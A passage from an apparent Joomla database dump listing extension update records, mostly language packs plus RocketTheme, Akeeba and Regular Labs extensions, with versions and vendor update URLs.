Simplified','','pkg_zh-CN','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(21428,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(21429,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(21430,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(21431,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(21432,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(21433,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(21434,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(21435,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(21436,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(21437,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(21438,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(21439,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(21440,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(21441,3,0,'English US','','pkg_en-US','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(21442,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(21443,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(21444,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(21445,3,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(21446,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(21447,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(21448,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(21449,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(21450,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(21451,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(21452,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(21453,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(21454,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(21455,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(21456,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(21457,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(21458,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(21459,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(21460,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(21461,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(21462,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(21463,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(21464,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(21465,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(21466,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(21467,20,0,'RokSprocket Module','','mod_roksprocket','module','',0,'2.1.28','0802','http://updates.rockettheme.com/joomla/138/b61e70db','',''),(21468,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(21469,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.46','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(21470,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(21471,20,0,'RokCandy Extension','','rokcandy','plugin','system',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/302/2df8a4e2','',''),(21472,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(21473,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(21474,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(21475,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(21476,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(21477,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(21478,57,0,'French','','pkg_fr-FR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(21479,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(21480,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(21481,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(21482,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(21483,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(21484,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(21485,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(21486,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(21487,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(21488,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(21489,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(21490,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(21491,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(21492,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(21493,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(21494,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(21495,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(21496,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(21497,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(21498,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(21499,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(21500,57,0,'English US','','pkg_en-US','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(21501,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(21502,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(21503,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(21504,57,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(21505,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(21506,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(21507,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(21508,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(21509,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(21510,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(21511,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(21512,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(21513,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(21514,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(21515,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(21516,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(21517,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(21518,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(21519,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(21520,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(21521,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(21522,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(21523,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(21524,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(21525,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.2.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/download/akeeba-backup/7-2-2.html',''),(21526,76,0,'Akeeba Frontend Framework (FEF)','','file_fef','file','',1,'1.0.13','','http://cdn.akeebabackup.com/updates/fef.xml','https://www.akeebabackup.com/download/fef/1-0-13.html',''),(21527,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.4.1FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(21528,101,0,'FOF 3.x Stable','','lib_fof30','library','',1,'3.6.2','','http://cdn.akeebabackup.com/updates/fof3_file.xml','https://www.akeebabackup.com/download/fof3/3-6-2.html',''),(21529,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(21530,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(21531,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(21532,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(21533,3,0,'French','','pkg_fr-FR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(21534,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(21535,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(21536,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(21537,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(21538,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(21539,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(21540,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(21541,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(21542,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(21543,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(21544,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(21545,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(21546,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(21547,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(21548,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(21549,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(21550,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(21551,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(21552,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(21553,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(21554,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(21555,3,0,'English US','','pkg_en-US','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(21556,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(21557,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(21558,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(21559,3,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(21560,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(21561,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(21562,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(21563,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(21564,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(21565,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(21566,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(21567,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(21568,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(21569,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(21570,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(21571,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(21572,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(21573,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(21574,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(21575,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(21576,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(21577,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(21578,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(21579,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(21580,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(21581,20,0,'RokSprocket Module','','mod_roksprocket','module','',0,'2.1.28','0802','http://updates.rockettheme.com/joomla/138/b61e70db','',''),(21582,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(21583,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.46','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(21584,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(21585,20,0,'RokCandy Extension','','rokcandy','plugin','system',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/302/2df8a4e2','',''),(21586,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(21587,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(21588,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(21589,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(21590,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(21591,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(21592,57,0,'French','','pkg_fr-FR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(21593,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(21594,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(21595,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(21596,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(21597,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(21598,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(21599,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(21600,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(21601,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(21602,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(21603,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(21604,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(21605,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(21606,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(21607,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(21608,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(21609,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(21610,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(21611,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(21612,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(21613,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(21614,57,0,'English US','','pkg_en-US','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(21615,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(21616,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(21617,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(21618,57,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(21619,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(21620,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(21621,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(21622,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(21623,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(21624,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(21625,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(21626,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(21627,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(21628,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(21629,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(21630,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(21631,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(21632,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(21633,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(21634,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(21635,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(21636,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(21637,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(21638,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(21639,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.2.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/download/akeeba-backup/7-2-2.html',''),(21640,76,0,'Akeeba Frontend Framework (FEF)','','file_fef','file','',1,'1.0.13','','http://cdn.akeebabackup.com/updates/fef.xml','https://www.akeebabackup.com/download/fef/1-0-13.html',''),(21641,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.4.1FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(21642,101,0,'FOF 3.x 